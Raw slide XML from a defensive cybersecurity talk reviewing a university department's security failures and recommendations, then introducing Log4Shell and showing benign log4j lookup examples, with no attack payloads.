          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555859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731D-7562-E14A-9C5B-AE7301F6553F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Going it Alone”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90B7552B-2BF4-A14F-96D2-3EBE17EC437D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> [COC] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>either were unwilling to accept, or were simply unaware that the resources they had allocated for cybersecurity were inadequate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>There were attempts to create a dialogue between MSU IT and PA but those attempts failed to set up a communications channel to share what IT security services MSU IT offers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2440916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4B71-E0D6-AE4E-BDF8-FF0256FED944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>"Productivity Trumping Security”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6F49424-0457-3F43-BB16-20D96A35CFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>No information security officer present and involved in the COC’s decision process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PA IT staff was instructed by the COC to regularly prioritize faculty research over other maintenance tasks, including security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A review determined multiple IT devices were missing critical patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>NAS devices were used as the data-loss-prevention solution, as well as a perpetual cache for administration and research data.  They were easy to access and always online</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3140141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5967-0810-414D-A590-0DD13341F93F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>"Productivity Trumping Security”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E91A45-9537-AA4D-89B5-BEA87C9C8264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>COC determined that a Junior Sysadmin should be responsible for security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The Junior Sysadmin did not receive any IT security training</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>While these patterns didn’t cause the intrusion, these cultural influences created a vulnerable environment for the attackers to exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1479170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8EFB-F092-8748-9C40-57DC13D5A9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F8A871-75D9-B049-B084-01A8F7A815E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Delete sensitive data, and retain only what’s needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Create segmented networks and backup systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Have an IR plan in place that includes a point of contact list and a chain of command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Provide cybersecurity training for IT staff, and consult with cybersecurity experts that work with academia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4037079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8FED-17DF-2F42-B4EF-302CA5FC122B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E2BC2E-872E-3A46-BC52-DF3BE73BD140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Build a relationship with centralized IT and utilize their resources (vulnerability scanning, intrusion detection, centralized email, DLP, centralized authentication w MFA and SSO, confirmation management, VPN, threat intel, EDR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2192943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C9FD8-B846-DB46-8723-FC3B4DDCB30C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You Can Keep Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{133BDE30-E45F-2C4B-B0AD-15DF488867C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If a department wants to maintain control over IT decisions: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>They must have adequate cybersecurity resources in place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>They must have IT staff trained in cybersecurity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Department leadership must accept the risk of having full autonomy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3766406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543D5-6992-574E-A18F-07D690E0FD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Afterwards…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E0F626-2BEA-1C47-9832-A84C52C7A982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>At MSU, many of PA’s internally run systems have now been off-boarded to MSU IT. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A fringe benefit—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>when units let go of local IT control, it allows them to fully focus on their mission of research and education</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32589812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9ECC-FD75-7742-92C2-29F0B6E2C2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4j (Log4Shell)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73AA7DC2-297A-9342-B648-447A8A915291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>log4j is a commonly used Java logging utility in software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>EVERYWHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>In December 2021 a vulnerability was discovered in a part of log4j that is used to easily expand logging messages that could be used to execute arbitrary code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This quickly set the IT world on fire and that fire will continue to burn for quite some time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299435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“Cyber Kill Chain”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="CyberThreatKillChain.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-176619" b="-176619"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="334879" y="3144795"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0786959E-B32C-BB4F-8706-AED6909E8B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661737" y="1720516"/>
            <a:ext cx="6966284" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Developed by Lockheed Martin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“…Model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="819330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800-20E2-4447-8754-86113F082311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Is Probably Used On</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24D7C1D4-C2D0-1B4D-83F8-A4126C94EBBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Internet-facing systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Internal/back-end systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Network switches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Logging systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Internally developed apps </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Third-party apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SaaS and cloud services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Environments an organization doesn’t even know about. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Shadow IT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Everything is a potential risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3083766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03E5-501A-BA4C-81AC-824A25EF0F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>log4j – How It’s Supposed To Work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B0E348-2299-3244-AE52-CB00B0BB18F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>log.debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(“This is a log message”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“This is a log message”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>log.debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(“Java version: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>java:version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>}”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“Java version: Java version 1.7.0_67”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
